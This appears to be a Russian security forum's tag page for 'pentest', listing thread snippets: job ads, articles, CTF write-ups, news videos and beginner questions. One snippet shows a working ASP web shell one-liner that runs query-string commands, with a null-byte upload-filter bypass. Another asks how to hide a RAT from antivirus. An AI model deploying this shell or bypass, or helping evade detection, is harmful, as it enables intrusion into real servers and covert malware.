pentest

  1. J

    Ищу веб пентестера!

    Всем доброго времени суток! Требуется веб пентест личного ресурса. От вас крепкий скил, от нас хорошая оплата по результату пентеста. Пентест нужен с отчетом, не просто потыкать руками и прогнать сканером. Пентестить нужно сайт на пхп и вебсокетах Работа через любой уважаемый гарант сервис. В...
  2. Mark Klintov

    Статья Лаборатория в коробке. Создаем систему для пентестов

    Введение Многие люди очень часто любят путать пентест с обычной эксплуатацией уязвимостей. Давай я немного объясню. Само понятие теста на проникновения подразумевает использования всех аспектов и важных частей информационной безопасности. То есть перед тобой ставят компьютер с операционной...
  3. mcfly

    Видео bypass 802.1x

    EEE 802.1X ― это стандарт, который используется для аутентификации и авторизации пользователей и рабочих станций в сети передачи данных. Он осуществляет контроль доступа и не позволяет неавторизованным устройствам подключаться к локальной сети. Наибольшее распространение протокол получил в...
  4. mcfly

    Видео Acl атаки в Windows Aсtive Directory.

    Основные наборы привилегий, которые позволяют проводить атаки на AD.
  5. silero

    kali linux

    Хей, хочу поставить kali linux на внешний жесткий диск, возможно ли это? Как подключатся? И возможно ли сделать так: перед запуском пк подключаешь внешний жесткий диск, включаешь, и запускается kali. После работы выключаешь пк, отключаешь внешний жесткий диск, включаешь его и запускается винда...
  6. Sultan Mahmudov

    Вакансия Аудитор Pentest | Penetration Testing Engineer

    Мы — создатели одной из самых быстрых транспортно-логистических сетей в России и интернет-магазинов на собственной платформе. Это не стартапы — это продуктовая разработка в уже действующих проектах. Mag Development - аккредитованная IT-компания. Работать можно дистанционно или в одном из наших...
  7. szybnev

    Статья Скрываясь на виду у всех. №2

    Это вторая часть статьи о проксировании загрузки DLL для скрытия подозрительных следов стека, ведущих к выделенной пользователем области RX. Первая часть здесь, она обязательна к прочтению! Я не буду углубляться в то, как работает стек, потому что я уже рассказал об этом в предыдущей статье...
  8. Frintezza

    Ошибка при загрузки оболочки asp

    Привет) пытаюсь загрузить оболочку но сервер выдает ошибку по началу сервер не давал закидавать .asp файл file.asp <%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%> потом я это обошел так: file.asp%00.jpg GIF89a; <%response.write...
  9. apache2

    Заметка Автоматизируем простые задачи на удалённой машине [Poor Man's Pentest]

    В этой статье я расскажу о том, как использовать и установить Poor Man's Pentest на примере создания полного интерактивного TTY шела (Fully Interactive TTY Shell) git clone https://github.com/JohnHammond/poor-mans-pentest.git cd poor-mans-pentest mkdir /opt/pmp cp functions.sh /opt/pmp/ Для...
  10. G

    CTF Проходим лёгкие комнаты TryHackMe #2

    Всем привет.В прошлой теме CTF - Проходим лёгкие комнаты TryHackMe я получил неплохую отдачу от вас и решил продолжить рассказывать про легкие комнаты THM.Я не буду расписывать моменты о которых уже говорил , буду стараться написать что-то уникальное , как минимум для меня:) Давайте начнем с...
  11. Demoness

    Pentest как научиться?

    Привет. Очень хотелось бы научитсья пентестингу и иметь такие знание. На форуме вижу много людей кто это знает и я думаю что, почему бы и нет. Как научиться? Что делать и как начать? Спасибо!
  12. Codeby News

    News 96% российских организаций не защищены от проникновения

    Positive Technologies опубликовала результаты пентестов за 2021-2022 годы. Во всех компаниях был взят полный контроль над инфраструктурой. В 9 из 10 случаев злоумышленник получал доступ к коммерческим тайнам. В тесте на кибербезопасность приняли участие 50 проектов из 30 российских организаций...
  13. Аудит безопасности Wifi роутера. Теория и практика! Aircrackng, Airgeddon!

    Аудит безопасности Wifi роутера. Теория и практика! Aircrackng, Airgeddon!

    Доброго всем времени суток! Представляем вам ролик, который расскажет вам, как защитить свой домашний, и не только, маршрутизатор. Познакомимся с защитой роутера и попробуем ее обойти! Приятного просмотра! __________________________________________________________________________ ⚠️ ⚠️ ⚠️...
  14. J

    Вопрос о криптографии.

    Здрав буде бояре!!! Буду безмерно благодарен если вы подскажете мне как можно закриптовать, скрыть деятельность вредоноса типа RAT. Сделать файл который при скачивании в тестовую среду не обнаруживается - это не проблема. Проблема в том что при установке и выполнении своих функций его...
  15. redlineo

    Статья В поисках туториала по пентесту

    Последние год-полтора я медленно бродил по просторам интернета в поисках информации по становлению специалистом по ИБ и пентесту. В основном суть информации сводилась к "что нужно знать специалисту по ИБ", "что должен уметь специалист по ИБ". Это всё не давало никакого представления пути...
  16. H

    Проверка почтового сервера

    Доброго времени суток. Мне интересно , как проводится аудит (белый бокс) почтового сервера? Компания вот например говорит хочу, чтоб проверили наш почтовый сервер. какие исходные данные нужны от заказчика и сколько стоит приблизительно, если заказать ?
  17. Crazy Jack

    Статья Нововведения Kali Linux 2022.3. Как обновиться?

    9 августа Offensive Security объявила о выпуске Kali Linux 2022.3. В своем объявлении Offensive Security подтвердила несколько новых вещей, недавно добавленных исключительно в эту третью версию 2022 года. Этот пост написан, чтобы читатели могли узнать больше о том, что нового в Kali Linux...
  18. Вирус в UEFI | Алиса стала умнее | Печать Еды и другое

    Вирус в UEFI | Алиса стала умнее | Печать Еды и другое

    Не забудь заглянуть в описание! Там много интересного 👀 📆 В этом выпуске: ✔️ Алиса сможет связывать поисковые сессии между собой ✔️ Kaspersky CosmicStrand ✔️ Атомдата - виртуальный оператор ✔️ Microsoft не продлила SPLA контракт с Yandex Cloud ✔️ Microsoft решила проблему ✔️ Пищевой принтер ✔️...
  19. EasyHacking - Burpsuite. Часть 1я.

    EasyHacking - Burpsuite. Часть 1я.

    Рубрика роликов про вводную часть в пентест, здесь мы на пальцах будем разбирать те или иные утилиты которые подтолкнут вас в разнообразный мир пентеста. В данном ролике мы на примере CTF pickle rick, будем разбирать некоторые функции большой программы Burpsuite. Вы научитесь автоматизировать...
  20. SOC От Мегафон | Windows AutoPatch | Chrome OS | Apple Теряет дизайнера | и др.

    SOC От Мегафон | Windows AutoPatch | Chrome OS | Apple Теряет дизайнера | и др.

    Не забудь заглянуть в описание! Там много интересного 👀 📆 В этом выпуске: ✔️ Мегафон запускает свой SOC ✔️ Компании хотят начать использовать неназемные сети пятого поколения ✔️ ViPNet L2-10G получил сертификат ФСБ России ✔️ Технологию Bluetooth LE Audio приняли для беспроводных наушников ✔️...